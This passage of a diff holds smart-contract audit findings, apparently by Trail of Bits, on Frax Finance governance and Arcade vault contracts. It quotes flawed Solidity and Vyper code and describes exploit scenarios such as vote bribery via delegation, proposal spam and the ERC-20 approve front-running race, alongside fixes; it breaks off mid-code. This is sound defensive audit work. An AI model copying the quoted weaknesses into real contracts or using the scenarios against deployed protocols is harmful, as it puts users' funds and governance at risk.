+6. Votes can be delegated to contracts Severity: Informational Difficulty: Low Type: Undefined Behavior Finding ID: TOB-FRAXGOV-6 Target: VeFxsVotingDelegation.sol Description Votes can be delegated to smart contracts. This behavior contrasts with the fact that FXS tokens can be locked only in whitelisted contracts. Allowing votes to be delegated to smart contracts could lead to unexpected behavior. By default, smart contracts are unable to gain voting power; to gain voting power, they need to be explicitly whitelisted by the Frax Finance team in the veFXS contract.

@internal
def assert_not_contract(addr: address):
    """
    @notice Check if the call is from a whitelisted smart contract, revert if not
    @param addr Address to be checked
    """
    if addr != tx.origin:
        checker: address = self.smart_wallet_checker
        if checker != ZERO_ADDRESS:
            if SmartWalletChecker(checker).check(addr):
                return
        raise "Smart contract depositors not allowed"

Figure 6.1: The contract check in veFXS.vy

This is the intended design of the voting escrow contract, as allowing smart contracts to vote would enable wrapped tokens and bribes. The VeFxsVotingDelegation contract enables users to delegate their voting power to other addresses, but it does not contain a check for smart contracts. This means that smart contracts can now hold voting power, and the team is unable to disallow this.

function _delegate(address delegator, address delegatee) internal {
    // Revert if delegating to self with address(0), should be address(delegator)
    if (delegatee == address(0)) revert IVeFxsVotingDelegation.IncorrectSelfDelegation();

    IVeFxsVotingDelegation.Delegation memory previousDelegation = $delegations[delegator];

    // This ensures that checkpoints take effect at the next epoch
    uint256 checkpointTimestamp = ((block.timestamp / 1 days) * 1 days) + 1 days;

    IVeFxsVotingDelegation.NormalizedVeFxsLockInfo memory normalizedDelegatorVeFxsLockInfo =
        _getNormalizedVeFxsLockInfo({ delegator: delegator, checkpointTimestamp: checkpointTimestamp });

    _moveVotingPowerFromPreviousDelegate({
        previousDelegation: previousDelegation,
        checkpointTimestamp: checkpointTimestamp
    });
    _moveVotingPowerToNewDelegate({
        newDelegate: delegatee,
        delegatorVeFxsLockInfo: normalizedDelegatorVeFxsLockInfo,
        checkpointTimestamp: checkpointTimestamp
    });

    // ...
}

Figure 6.2: The _delegate function in VeFxsVotingDelegation.sol

Exploit Scenario Eve sets up a contract that accepts delegated votes in exchange for rewards. The contract ends up owning a majority of the FXS voting power. Recommendations Short term, consider whether smart contracts should be allowed to hold voting power. If so, document this fact; if not, add a check to the VeFxsVotingDelegation contract to ensure that addresses receiving delegated voting power are not smart contracts. Long term, when implementing new features, consider the implications of adding them to ensure that they do not lift constraints that were placed beforehand.
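If contracts should not receive delegations, the check could mirror the veFXS approach. A minimal sketch, adding a code-size check at the top of the _delegate function from figure 6.2 (the DelegateeIsContract error name is illustrative); note that a code-size check cannot detect a contract that delegates from its constructor, so, like the tx.origin check in veFXS.vy, it is a deterrent rather than a guarantee.

error DelegateeIsContract(address delegatee); // illustrative error

function _delegate(address delegator, address delegatee) internal {
    // Revert if delegating to self with address(0), should be address(delegator)
    if (delegatee == address(0)) revert IVeFxsVotingDelegation.IncorrectSelfDelegation();

    // Disallow delegatees with deployed code
    if (delegatee.code.length != 0) revert DelegateeIsContract(delegatee);

    // ... remainder of the existing _delegate logic from figure 6.2 ...
}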
+7. Lack of public documentation regarding voting power expiry Severity: Informational Difficulty: Low Type: Patching Finding ID: TOB-FRAXGOV-7 Target: VeFxsVotingDelegation.sol Description The user documentation concerning the calculation of voting power is unclear. The Frax-Governance specification sheet provided by the Frax Finance team states, "Voting power goes to 0 at veFXS lock expiration time, this is different from veFXS.getBalance() which will return the locked amount of FXS after the lock has expired." This statement is in line with the code's behavior. The _calculateVotingWeight function in the VeFxsVotingDelegation contract does not return the locked veFXS balance once a lock has expired.

/// @notice The ```_calculateVotingWeight``` function calculates ```account```'s voting weight.
///         Is 0 if they ever delegated and the delegation is in effect.
/// @param voter Address of voter
/// @param timestamp A block.timestamp, typically corresponding to a proposal snapshot
/// @return votingWeight Voting weight corresponding to ```account```'s veFXS balance
function _calculateVotingWeight(address voter, uint256 timestamp) internal view returns (uint256) {
    // If lock is expired they have no voting weight
    if (VE_FXS.locked(voter).end <= timestamp) return 0;

    uint256 firstDelegationTimestamp = $delegations[voter].firstDelegationTimestamp;
    // Never delegated OR this timestamp is before the first delegation by account
    if (firstDelegationTimestamp == 0 || timestamp < firstDelegationTimestamp) {
        try VE_FXS.balanceOf({ addr: voter, _t: timestamp }) returns (uint256 _balance) {
            return _balance;
        } catch {}
    }

    return 0;
}

Figure 7.2: The function that calculates the voting weight in VeFxsVotingDelegation.sol

If a voter's lock has expired or was never created, the short-circuit condition returns zero voting power. This behavior contrasts with the veFXS.balanceOf function, which would return the user's last locked FXS balance.

@external
@view
def balanceOf(addr: address, _t: uint256 = block.timestamp) -> uint256:
    """
    @notice Get the current voting power for `msg.sender`
    @dev Adheres to the ERC20 `balanceOf` interface for Aragon compatibility
    @param addr User wallet address
    @param _t Epoch time to return voting power at
    @return User voting power
    """
    _epoch: uint256 = self.user_point_epoch[addr]
    if _epoch == 0:
        return 0
    else:
        last_point: Point = self.user_point_history[addr][_epoch]
        last_point.bias -= last_point.slope * convert(_t - last_point.ts, int128)
        if last_point.bias < 0:
            last_point.bias = 0
        unweighted_supply: uint256 = convert(last_point.bias, uint256)  # Original from veCRV
        weighted_supply: uint256 = last_point.fxs_amt + (VOTE_WEIGHT_MULTIPLIER * unweighted_supply)
        return weighted_supply

Figure 7.1: The balanceOf function in veFXS.vy

This divergence should be clearly documented in the code and should be reflected in Frax Finance's public-facing documentation, which does not mention the fact that an expired lock does not hold any voting power: "Each veFXS has 1 vote in governance proposals. Staking 1 FXS for the maximum time, 4 years, would generate 4 veFXS. This veFXS balance itself will slowly decay down to 1 veFXS after 4 years, [...]". Exploit Scenario Alice buys FXS to be able to vote on a proposal. She is not aware that she is required to create a lock (even if expired) to have any voting power at all. She is unable to vote for the proposal. Recommendations Short term, modify the VeFxsVotingDelegation contract to reflect the desired voting power curve and/or document whether this is intended behavior. Long term, make sure to keep public-facing documentation up to date when changes are made.

+8. Spamming risk in propose functions Severity: Informational Difficulty: Low Type: Configuration Finding ID: TOB-FRAXGOV-8 Target: FraxGovernorAlpha.sol, FraxGovernorBravo.sol Description Anyone with enough veFXS tokens to meet the proposal threshold can submit an unbounded number of proposals to both the FraxGovernorAlpha and FraxGovernorOmega contracts.
The only requirement for submitting proposals is that the msg.sender address must have a balance of veFXS tokens larger than the _proposalThreshold value. Once that requirement is met, a user can submit as many proposals as they would like. A large volume of proposals may create difficulties for off-chain monitoring solutions and user-interface interactions.

function _requireSenderAboveProposalThreshold() internal view {
    if (_getVotes(msg.sender, block.timestamp - 1, "") < proposalThreshold()) {
        revert SenderVotingWeightBelowProposalThreshold();
    }
}

Figure 8.1: The _requireSenderAboveProposalThreshold function, called by the propose function (FraxGovernorBase.sol#L104-L108)

Exploit Scenario Mallory has 100,000 voting power. She submits one million proposals with small but unique changes to the description field of each one. The system saves one million unique proposals and emits one million ProposalCreated events. Front-end components and off-chain monitoring systems are spammed with large quantities of data. Recommendations Short term, track and limit the number of proposals a user can have active at any given time. Long term, consider cases of user interactions beyond just the intended use cases for potential malicious behavior.
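One possible shape for the short-term recommendation is a per-proposer cap on simultaneously open proposals, checked next to the threshold check in figure 8.1. The constant, mapping, and error below are illustrative assumptions; a real implementation would also have to decrement the counter reliably when proposals are executed, canceled, or expire.

uint256 public constant MAX_ACTIVE_PROPOSALS = 10; // illustrative bound
mapping(address => uint256) public activeProposalCount;

error SenderHasTooManyActiveProposals(); // illustrative error

function _requireSenderBelowProposalCap() internal view {
    if (activeProposalCount[msg.sender] >= MAX_ACTIVE_PROPOSALS) {
        revert SenderHasTooManyActiveProposals();
    }
}

// propose() would call _requireSenderBelowProposalCap() alongside
// _requireSenderAboveProposalThreshold(), increment the count after a
// successful _propose(), and decrement it when the proposal closes.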
A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and difficulty levels used in this document.

Vulnerability Categories
Access Controls: Insufficient authorization or assessment of rights
Auditing and Logging: Insufficient auditing of actions or logging of problems
Authentication: Improper identification of users
Configuration: Misconfigured servers, devices, or software components
Cryptography: A breach of system confidentiality or integrity
Data Exposure: Exposure of sensitive information
Data Validation: Improper reliance on the structure or values of data
Denial of Service: A system failure with an availability impact
Error Reporting: Insecure or insufficient reporting of error conditions
Patching: Use of an outdated software package or library
Session Management: Improper identification of authenticated users
Testing: Insufficient test methodology or test coverage
Timing: Race conditions or other order-of-operations flaws
Undefined Behavior: Undefined behavior triggered within the system

Severity Levels
Informational: The issue does not pose an immediate risk but is relevant to security best practices.
Undetermined: The extent of the risk was not determined during this engagement.
Low: The risk is small or is not one the client has indicated is important.
Medium: User information is at risk; exploitation could pose reputational, legal, or moderate financial risks.
High: The flaw could affect numerous users and have serious reputational, legal, or financial implications.

Difficulty Levels
Undetermined: The difficulty of exploitation was not determined during this engagement.
Low: The flaw is well known; public tools for its exploitation exist or can be scripted.
Medium: An attacker must write an exploit or will need in-depth knowledge of the system.
High: An attacker must have privileged access to the system, may need to know complex technical details, or must discover other weaknesses to exploit this issue.

B. Code Maturity Categories The following tables describe the code maturity categories and rating criteria used in this document.

Code Maturity Categories
Arithmetic: The proper use of mathematical operations and semantics
Auditing: The use of event auditing and logging to support monitoring
Authentication / Access Controls: The use of robust access controls to handle identification and authorization and to ensure safe interactions with the system
Complexity Management: The presence of clear structures designed to manage system complexity, including the separation of system logic into clearly defined functions
Cryptography and Key Management: The safe use of cryptographic primitives and functions, along with the presence of robust mechanisms for key generation and distribution
Decentralization: The presence of a decentralized governance structure for mitigating insider threats and managing risks posed by contract upgrades
Documentation: The presence of comprehensive and readable codebase documentation
Front-Running Resistance: The system's resistance to front-running attacks
Low-Level Manipulation: The justified use of inline assembly and low-level calls
Testing and Verification: The presence of robust testing procedures (e.g., unit tests, integration tests, and verification methods) and sufficient test coverage

Rating Criteria
Strong: No issues were found, and the system exceeds industry standards.
Satisfactory: Minor issues were found, but the system is compliant with best practices.
Moderate: Some issues that may affect system safety were found.
Weak: Many issues that affect system safety were found.
Missing: A required component is missing, significantly affecting system safety.
Not Applicable: The category is not applicable to this review.
Not Considered: The category was not considered in this review.
Further Investigation Required: Further investigation is required to reach a meaningful conclusion.

C. Multisignature Wallet Best Practices Consensus requirements for sensitive actions, such as spending funds from a wallet, are meant to mitigate the risks of the following:
● Any one person overruling the judgment of others
● Failures caused by any one person's mistake
● Failures caused by the compromise of any one person's credentials
For example, in a 2-of-3 multisignature wallet, the authority to execute a "spend" transaction would require a consensus of two individuals in possession of two of the wallet's three private keys. For this model to be useful, the following conditions are required:
1. The private keys must be stored or held separately, and access to each one must be limited to a unique individual.
2. If the keys are physically held by third-party custodians (e.g., a bank), multiple keys should not be stored with the same custodian. (Doing so would violate requirement #1.)
3. The person asked to provide the second and final signature on a transaction (i.e., the co-signer) should refer to a pre-established policy specifying the conditions for approving the transaction by signing it with his or her key.
4. The co-signer should also verify that the half-signed transaction was generated willingly by the intended holder of the first signature's key.
Requirement #3 prevents the co-signer from becoming merely a "deputy" acting on behalf of the first signer (forfeiting the decision-making responsibility to the first signer and defeating the security model). If the co-signer can refuse to approve the transaction for any reason, the due-diligence conditions for approval may be unclear. That is why a policy for validating transactions is needed.
A verification policy could include the following:
● A protocol for handling a request to co-sign a transaction (e.g., a half-signed transaction will be accepted only via an approved channel)
● An allowlist of specific addresses allowed to be the payee of a transaction
● A limit on the amount of funds spent in a single transaction or in a single day
Requirement #4 mitigates the risks associated with a single stolen key. For example, say that an attacker somehow acquired the unlocked Ledger Nano S of one of the signatories. A voice call from the co-signer to the initiating signatory to confirm the transaction would reveal that the key had been stolen and that the transaction should not be co-signed. If the signatory were under an active threat of violence, he or she could use a duress code (a code word, a phrase, or another signal agreed upon in advance) to covertly alert the others that the transaction had not been initiated willingly, without alerting the attacker.

D. Code Quality Findings This appendix lists a finding that is not associated with specific vulnerabilities.

GovernorCountingFractional
● Update the GovernorCountingFractional contract to import Frax Finance's modified Governor.sol contract. GovernorCountingFractional imports the unmodified OpenZeppelin Governor contract, though it does not use it directly or inherit from it. In the event of more extensive future modifications, it may become unclear to readers or tooling which Governor contract should be correctly referenced.

E. Incident Response Plan Recommendations This section provides recommendations on formulating an incident response plan.
● Identify the parties (either specific people or roles) responsible for implementing the mitigations when an issue occurs (e.g., deploying smart contracts, pausing contracts, upgrading the front end, etc.).
● Clearly describe the intended contract deployment process.
● Outline the circumstances under which Frax Finance will compensate users affected by an issue (if any).
○ Issues that warrant compensation could include an individual or aggregate loss or a loss resulting from user error, a contract flaw, or a third-party contract flaw.
● Document how the team plans to stay up to date on new issues that could affect the system; awareness of such issues will inform future development work and help the team secure the deployment toolchain and the external on-chain and off-chain services that the system relies on.
○ Identify sources of vulnerability news for each language and component used in the system, and subscribe to updates from each source. Consider creating a private Discord channel in which a bot will post the latest vulnerability news; this will provide the team with a way to track all updates in one place. Lastly, consider assigning certain team members to track news about vulnerabilities in specific components of the system.
● Determine when the team will seek assistance from external parties (e.g., auditors, affected users, other protocol developers, etc.) and how it will onboard them.
○ Effective remediation of certain issues may require collaboration with external parties.
● Define contract behavior that would be considered abnormal by off-chain monitoring solutions.
It is best practice to perform periodic dry runs of scenarios outlined in the incident response plan to find omissions and opportunities for improvement and to develop "muscle memory." Additionally, document the frequency with which the team should perform dry runs of various scenarios, and perform dry runs of more likely scenarios more regularly. Create a template to be filled out with descriptions of any necessary improvements after each dry run.

J. Fix Review Results When undertaking a fix review, Trail of Bits reviews the fixes implemented for issues identified in the original report. This work involves a review of specific areas of the source code and system configuration, not comprehensive analysis of the system. On June 28, 2023, Trail of Bits reviewed the fixes and mitigations implemented by the Frax Finance team for the issues identified in this report. We reviewed each fix to determine its effectiveness in resolving the associated issue. In summary, of the eight issues described in this report, Frax Finance has resolved four issues, has partially resolved one issue, and has not resolved the remaining three issues. For additional information, please see the Detailed Fix Review Results below.

ID 1: Race condition in FraxGovernorOmega target validation (Severity: High) - Resolved
ID 2: Vulnerable project dependency (Severity: Undetermined) - Resolved
ID 3: Replay protection missing in castVoteWithReasonAndParamsBySig (Severity: Medium) - Resolved
ID 4: Ability to lock any user's tokens using deposit_for (Severity: Informational) - Unresolved
ID 5: The relay function can be used to call critical safe functions (Severity: High) - Resolved
ID 6: Votes can be delegated to contracts (Severity: Informational) - Unresolved
ID 7: Lack of public documentation regarding voting power expiry (Severity: Informational) - Unresolved
ID 8: Spamming risk in propose functions (Severity: Informational) - Partially Resolved

Detailed Fix Review Results

TOB-FRAXGOV-1: Race condition in FraxGovernorOmega target validation Resolved in commit ed4e708. The propose function has been updated in the FraxGovernorOmega contract to revert whenever it is called. This update will prevent a proposal from being submitted that would interact with a safe that is pending approval to join the allowlist in FraxGovernorAlpha.

TOB-FRAXGOV-2: Vulnerable project dependency Resolved in commit ed4e708. The vulnerable project dependency cited in this issue has been updated to a version where the vulnerability has been resolved.

TOB-FRAXGOV-3: Replay protection missing in castVoteWithReasonAndParamsBySig Resolved in commit 00d0b07. The castVoteWithReasonAndParamsBySig function has been updated to include a nonce value in the checked signature. If a malicious actor tried to reuse the same signature to cast the targeted user's remaining voting weight, the transaction would revert.

TOB-FRAXGOV-4: Ability to lock any user's tokens using deposit_for Not resolved. Frax Finance provided the following statement about this issue: This issue has been communicated to partners and users; mitigated by avoiding excessive approvals.

TOB-FRAXGOV-5: The relay function can be used to call critical safe functions Resolved in commit 00d0b07. The relay function has been updated in the Governor contract to revert whenever it is called. Furthermore, the propose function has been updated to revert whenever it is called, so the attack vector for this issue has been removed by both of these updates.

TOB-FRAXGOV-6: Votes can be delegated to contracts Not resolved. Frax Finance provided the following statement about this issue: This behavior is intended.

TOB-FRAXGOV-7: Lack of public documentation regarding voting power expiry Not resolved. Frax Finance provided the following statement about this issue: This will be addressed in documentation.

TOB-FRAXGOV-8: Spamming risk in propose functions Partially resolved in commit ed4e708.
The propose function has been updated in the FraxGovernorOmega contract to revert whenever it is called. However, in the FraxGovernorAlpha contract it is still possible for a user to spam the propose function so long as the caller meets the proposal threshold. Frax Finance provided the following statement about this issue: This will be mitigated via minimum proposal voting power requirements configured during deployment. diff --git a/findings_newupdate/tob/2023-07-arcade-securityreview.txt b/findings_newupdate/tob/2023-07-arcade-securityreview.txt new file mode 100644 index 0000000..e4866b1 --- /dev/null +++ b/findings_newupdate/tob/2023-07-arcade-securityreview.txt @@ -0,0 +1,35 @@

+2. Solidity compiler optimizations can be problematic Severity: Undetermined Difficulty: High Type: Undefined Behavior Finding ID: TOB-ARCADE-2 Target: hardhat.config.ts Description Arcade has enabled optional compiler optimizations in Solidity. According to a November 2018 audit of the Solidity compiler, the optional optimizations may not be safe.

optimizer: {
    enabled: optimizerEnabled,
    runs: 200,
},

Figure 2.1: The solc optimizer settings in arcade-protocol/hardhat.config.ts

High-severity security issues due to optimization bugs have occurred in the past. A high-severity bug in the emscripten-generated solc-js compiler used by Truffle and Remix persisted until late 2018; the fix for this bug was not reported in the Solidity changelog. Another high-severity optimization bug resulting in incorrect bit shift results was patched in Solidity 0.5.6. Another bug due to the incorrect caching of Keccak-256 was reported. It is likely that there are latent bugs related to optimization and that future optimizations will introduce new bugs. Exploit Scenario A latent or future bug in Solidity compiler optimizations, or in the Emscripten transpilation to solc-js, causes a security vulnerability in the Arcade contracts. Recommendations Short term, measure the gas savings from optimizations and carefully weigh them against the possibility of an optimization-related bug. Long term, monitor the development and adoption of Solidity compiler optimizations to assess their maturity.

+3. callApprove does not follow approval best practices Severity: Informational Difficulty: Medium Type: Undefined Behavior Finding ID: TOB-ARCADE-3 Target: contracts/vault/AssetVault.sol Description The AssetVault.callApprove function has undocumented behaviors and lacks the increase/decrease approval functions, which might impede third-party integrations. A well-known race condition exists in the ERC-20 approval mechanism. The race condition is enabled if a user or smart contract calls approve a second time on a spender that has already been allowed. If the spender sees the transaction containing the call before it has been mined, they can call transferFrom to transfer the previous value and then still receive authorization to transfer the new value. To mitigate this, AssetVault uses the SafeERC20.safeApprove function, which will revert if the allowance is updated from nonzero to nonzero. However, this behavior is not documented, and it might break the protocol's integration with third-party contracts or off-chain components.
function callApprove(
    address token,
    address spender,
    uint256 amount
) external override onlyAllowedCallers onlyWithdrawDisabled nonReentrant {
    if (!CallWhitelistApprovals(whitelist).isApproved(token, spender)) {
        revert AV_NonWhitelistedApproval(token, spender);
    }

    // Do approval
    IERC20(token).safeApprove(spender, amount);

    emit Approve(msg.sender, token, spender, amount);
}

Figure 3.1: The callApprove function in arcade-protocol/contracts/vault/AssetVault.sol

/**
 * @dev Deprecated. This function has issues similar to the ones found in
 * {IERC20-approve}, and its usage is discouraged.
 *
 * Whenever possible, use {safeIncreaseAllowance} and
 * {safeDecreaseAllowance} instead.
 */
function safeApprove(
    IERC20 token,
    address spender,
    uint256 value
) internal {
    // safeApprove should only be called when setting an initial allowance,
    // or when resetting it to zero. To increase and decrease it, use
    // 'safeIncreaseAllowance' and 'safeDecreaseAllowance'
    require(
        (value == 0) || (token.allowance(address(this), spender) == 0),
        "SafeERC20: approve from non-zero to non-zero allowance"
    );
    _callOptionalReturn(token, abi.encodeWithSelector(token.approve.selector, spender, value));
}

Figure 3.2: The safeApprove function in openzeppelin-contracts/contracts/token/ERC20/utils/SafeERC20.sol

An alternative way to mitigate the ERC-20 race condition is to use the increaseAllowance and decreaseAllowance functions to safely update allowances. These functions are widely used by the ecosystem and allow users to update approvals with less ambiguity.

function safeIncreaseAllowance(
    IERC20 token,
    address spender,
    uint256 value
) internal {
    uint256 newAllowance = token.allowance(address(this), spender) + value;
    _callOptionalReturn(token, abi.encodeWithSelector(token.approve.selector, spender, newAllowance));
}

function safeDecreaseAllowance(
    IERC20 token,
    address spender,
    uint256 value
) internal {
    unchecked {
        uint256 oldAllowance = token.allowance(address(this), spender);
        require(oldAllowance >= value, "SafeERC20: decreased allowance below zero");
        uint256 newAllowance = oldAllowance - value;
        _callOptionalReturn(token, abi.encodeWithSelector(token.approve.selector, spender, newAllowance));
    }
}

Figure 3.3: The safeIncreaseAllowance and safeDecreaseAllowance functions in openzeppelin-contracts/contracts/token/ERC20/utils/SafeERC20.sol

Exploit Scenario Alice, the owner of an asset vault, sets up an approval of 1,000 for her external contract by calling callApprove. She later decides to update the approval amount to 1,500 and again calls callApprove. This second call reverts, which she did not expect. Recommendations Short term, take one of the following actions:
● Update the documentation to make it clear to users and other integrating smart contract developers that two transactions are needed to update allowances.
● Add two new functions in the AssetVault contract: callIncreaseAllowance and callDecreaseAllowance, which internally call SafeERC20.safeIncreaseAllowance and SafeERC20.safeDecreaseAllowance, respectively (a sketch follows below).
Long term, when using external libraries/contracts, always ensure that they are being used correctly and that edge cases are explained in the documentation.
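A sketch of the two recommended functions, modeled on callApprove in figure 3.1; reusing the Approve event and the callApprove modifier set is an assumption about how Arcade might integrate them, not the project's actual code.

function callIncreaseAllowance(
    address token,
    address spender,
    uint256 amount
) external onlyAllowedCallers onlyWithdrawDisabled nonReentrant {
    if (!CallWhitelistApprovals(whitelist).isApproved(token, spender)) {
        revert AV_NonWhitelistedApproval(token, spender);
    }

    // Additive update; does not revert on an existing nonzero allowance
    IERC20(token).safeIncreaseAllowance(spender, amount);

    emit Approve(msg.sender, token, spender, IERC20(token).allowance(address(this), spender));
}

function callDecreaseAllowance(
    address token,
    address spender,
    uint256 amount
) external onlyAllowedCallers onlyWithdrawDisabled nonReentrant {
    if (!CallWhitelistApprovals(whitelist).isApproved(token, spender)) {
        revert AV_NonWhitelistedApproval(token, spender);
    }

    // Subtractive update; reverts if the allowance would go below zero
    IERC20(token).safeDecreaseAllowance(spender, amount);

    emit Approve(msg.sender, token, spender, IERC20(token).allowance(address(this), spender));
}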
+4. Risk of confusing events due to missing checks in whitelist contracts Severity: Low Difficulty: High Type: Data Validation Finding ID: TOB-ARCADE-4 Target: contracts/vault/CallWhitelist.sol, contracts/vault/CallWhitelistDelegation.sol Description The CallWhitelist contract's add and remove functions do not check whether the given call has been registered in the whitelist. As a result, add could be used to register calls that have already been registered, and remove could be used to remove calls that have never been registered; these types of calls would still emit events. For example, invoking remove with a call that is not in the whitelist would emit a CallRemoved event even though no call was removed. Such an event could confuse off-chain monitoring systems, or at least make it more difficult to retrace what happened by looking at the emitted event.

function add(address callee, bytes4 selector) external override onlyOwner {
    whitelist[callee][selector] = true;
    emit CallAdded(msg.sender, callee, selector);
}

Figure 4.1: The add function in arcade-protocol/contracts/vault/CallWhitelist.sol

function remove(address callee, bytes4 selector) external override onlyOwner {
    whitelist[callee][selector] = false;
    emit CallRemoved(msg.sender, callee, selector);
}

Figure 4.2: The remove function in arcade-protocol/contracts/vault/CallWhitelist.sol

A similar problem exists in the CallWhitelistDelegation.setRegistry function. This function can be called to set the registry address to the current registry address. In that case, the emitted RegistryChanged event would be confusing because nothing would have actually changed.

function setRegistry(address _registry) external onlyOwner {
    registry = IDelegationRegistry(_registry);

    emit RegistryChanged(msg.sender, _registry);
}

Figure 4.3: The setRegistry function in arcade-protocol/contracts/vault/CallWhitelistDelegation.sol

Arcade has explained that the owner of the whitelist contracts in Arcade V3 will be a (set of) governance contract(s), so it is unlikely that this issue will happen. However, it is possible, and it could be prevented by more validation. Exploit Scenario No calls have yet been added to the whitelist in CallWhitelist. Through the governance system, a proposal to remove a call with the address 0x1 and the selector 0x12345678 is approved. The proposal is executed, and CallWhitelist.remove is called. The transaction succeeds, and a CallRemoved event is emitted, even though the "removed" call was never in the whitelist in the first place. Recommendations Short term, add validation to the add, remove, and setRegistry functions. For the add function, it should ensure that the given call is not already in the whitelist. For the remove function, it should ensure that the call is currently in the whitelist. For the setRegistry function, it should ensure that the new registry address is not the current registry address. Adding this validation will prevent confusing events from being emitted and ease the tracing of events in the whitelist over time. Long term, when dealing with function arguments, always ensure that all inputs are validated as tightly as possible and that the subsequent emitted events are meaningful. Additionally, consider setting up an off-chain monitoring system that will track important system events. Such a system will provide an overview of the events that occur in the contracts and will be useful when incidents occur.
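A sketch of the recommended validation for CallWhitelist; the WL_AlreadyWhitelisted and WL_NotWhitelisted error names are illustrative, and setRegistry would get an analogous check that _registry differs from the current registry.

error WL_AlreadyWhitelisted(address callee, bytes4 selector); // illustrative
error WL_NotWhitelisted(address callee, bytes4 selector); // illustrative

function add(address callee, bytes4 selector) external override onlyOwner {
    // Ensure every CallAdded event corresponds to an actual state change
    if (whitelist[callee][selector]) revert WL_AlreadyWhitelisted(callee, selector);
    whitelist[callee][selector] = true;
    emit CallAdded(msg.sender, callee, selector);
}

function remove(address callee, bytes4 selector) external override onlyOwner {
    // Ensure every CallRemoved event corresponds to an actual state change
    if (!whitelist[callee][selector]) revert WL_NotWhitelisted(callee, selector);
    whitelist[callee][selector] = false;
    emit CallRemoved(msg.sender, callee, selector);
}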
+5. Missing checks of _exists() return value Severity: Informational Difficulty: High Type: Data Validation Finding ID: TOB-ARCADE-5 Target: contracts/PromissoryNote.sol, contracts/vault/VaultFactory.sol Description The ERC-721 _exists() function returns a Boolean value that indicates whether a token with the specified tokenId exists. In two instances in Arcade's codebase, the function is called but its return value is not checked, bypassing the intended result of the existence check. In particular, in the PromissoryNote.tokenURI() and VaultFactory.tokenURI() functions, _exists() is called before the URI for the tokenId is returned, but its return value is not checked. If the given NFT does not exist, the URI returned by the tokenURI() function will be incorrect, but this error will not be detected due to the missing return value check on _exists().

function tokenURI(uint256 tokenId) public view override(INFTWithDescriptor, ERC721) returns (string memory) {
    _exists(tokenId);
    return descriptor.tokenURI(address(this), tokenId);
}

Figure 5.1: The tokenURI function in arcade-protocol/contracts/PromissoryNote.sol

function tokenURI(address, uint256 tokenId) external view override returns (string memory) {
    return bytes(baseURI).length > 0 ? string(abi.encodePacked(baseURI, tokenId.toString())) : "";
}

Figure 5.2: The tokenURI function in arcade-protocol/contracts/nft/BaseURIDescriptor.sol

Exploit Scenario Bob, a developer of a front-end blockchain application that interacts with the Arcade contracts, develops a page that lists users' promissory notes and vaults with their respective URIs. He accidentally passes a nonexistent tokenId to tokenURI(), causing his application to show an incorrect or incomplete URI. Recommendations Short term, add a check for the _exists() function's return value to both of the tokenURI() functions to prevent them from returning an incomplete URI for nonexistent tokens. Long term, add new test cases to verify the expected return values of tokenURI() in all contracts that use it, with valid and invalid tokens as arguments.
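A sketch of the short-term fix for PromissoryNote.tokenURI, acting on the Boolean that the original code discards (the PN_DoesNotExist error name is illustrative); VaultFactory.tokenURI would get the same treatment.

error PN_DoesNotExist(uint256 tokenId); // illustrative error name

function tokenURI(uint256 tokenId) public view override(INFTWithDescriptor, ERC721) returns (string memory) {
    // Act on the existence check instead of discarding its result
    if (!_exists(tokenId)) revert PN_DoesNotExist(tokenId);
    return descriptor.tokenURI(address(this), tokenId);
}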
+6. Incorrect deployers in integration tests Severity: Informational Difficulty: High Type: Testing Finding ID: TOB-ARCADE-6 Target: test/Integration.ts Description The fixture deployment function in the provided integration tests uses different signers for deploying the Arcade contracts before performing the tests. All Arcade contracts are meant to be deployed by the protocol team, except for vaults, which are deployed by users using the VaultFactory contract. However, in the fixture deployment function, some contracts are deployed from the borrower account instead of the admin account. Some examples are shown in figure 6.1; however, there are other instances in which contracts are not deployed from the admin account.

const signers: SignerWithAddress[] = await ethers.getSigners();
const [borrower, lender, admin] = signers;

const whitelist = await deploy("CallWhitelist", signers[0], []);
const vaultTemplate = await deploy("AssetVault", signers[0], []);
const feeController = await deploy("FeeController", admin, []);
const descriptor = await deploy("BaseURIDescriptor", signers[0], [BASE_URI]);
const vaultFactory = await deploy("VaultFactory", signers[0], [vaultTemplate.address, whitelist.address, feeController.address, descriptor.address]);

Figure 6.1: A snippet of the tests in arcade-protocol/test/Integration.ts

Exploit Scenario Alice, a developer on the Arcade team, adds a new permissioned feature to the protocol. She adds the relevant integration tests for her feature, and all tests pass. However, because the deployer for the test contracts was not the admin account, those tests should have failed, and the contracts are deployed to the network with a bug. Recommendations Short term, correct all of the instances of incorrect deployers for the contracts in the integration tests file. Long term, add additional test cases to ensure that the account permissions in all deployed contracts are correct.

+7. Risk of out-of-gas revert due to use of transfer() in claimFees Severity: Informational Difficulty: High Type: Undefined Behavior Finding ID: TOB-ARCADE-7 Target: contracts/vault/VaultFactory.sol Description The VaultFactory.claimFees function uses the low-level transfer() operation to move the collected ETH fees to another arbitrary address. The transfer() operation sends only 2,300 units of gas with this operation. As a result, if the recipient is a contract with logic inside the receive() function, which would use extra gas, the operation will probably (depending on the gas cost) fail due to an out-of-gas revert.

function claimFees(address to) external onlyRole(FEE_CLAIMER_ROLE) {
    uint256 balance = address(this).balance;
    payable(to).transfer(balance);

    emit ClaimFees(to, balance);
}

Figure 7.1: The claimFees function in arcade-protocol/contracts/vault/VaultFactory.sol

The Arcade team has explained that the recipient will be a treasury contract with no logic inside the receive() function, meaning the current use of transfer() will not pose any problems. However, if at some point the recipient does contain logic inside the receive() function, then claimFees will likely revert and the contract will not be able to claim the funds. Note, however, that the fees could be claimed by another address (i.e., the fees will not be stuck). The withdrawETH function in the AssetVault contract uses Address.sendValue instead of transfer().

function withdrawETH(address to) external override onlyOwner onlyWithdrawEnabled nonReentrant {
    // perform transfer
    uint256 balance = address(this).balance;
    payable(to).sendValue(balance);

    emit WithdrawETH(msg.sender, to, balance);
}

Figure 7.2: The withdrawETH function in arcade-protocol/contracts/vault/AssetVault.sol

Address.sendValue internally uses the call() operation, passing along all of the remaining gas, so this function could be a good candidate to replace use of transfer() in claimFees. However, doing so could introduce other risks like reentrancy attacks. Note that neither the withdrawETH function nor the claimFees function is currently at risk of reentrancy attacks.
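For reference, a minimal sketch of claimFees using Address.sendValue, with a nonReentrant guard added to offset the wider reentrancy surface that call() opens up; it assumes VaultFactory pulls in OpenZeppelin's Address and ReentrancyGuard the way AssetVault does.

using Address for address payable;

function claimFees(address to) external onlyRole(FEE_CLAIMER_ROLE) nonReentrant {
    uint256 balance = address(this).balance;

    // sendValue forwards all remaining gas, so a treasury contract with
    // logic in receive() no longer reverts at the 2,300-gas stipend
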